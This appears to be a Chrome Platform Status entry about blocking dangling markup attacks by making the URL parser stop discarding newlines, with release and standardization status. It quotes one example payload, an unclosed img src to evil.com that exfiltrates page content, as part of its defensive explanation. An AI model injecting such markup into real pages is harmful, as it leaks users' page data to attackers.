As discussed in https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ, some forms of dangling markup attacks rely upon injecting an unclosed attribute that sucks up portions of a page, and exfiltrates them to an external endpoint (e.g. `<img src='https://evil.com/?` eats the page until the next `'`). This is possible because the URL parser helpfully discards newline characters. It would be lovely if we could make the parser less helpful.
Specification
Status in Chromium
Removed (tracking bug) in:
- Chrome for desktop release 61
- Chrome for Android release 61
- Android WebView release 61
Consensus & Standardization
After a feature ships in Chrome, the values listed here are not guaranteed to be up to date.
- No signal
- No signal
- No signal
- No signals
Owner
Last updated on 2020-11-09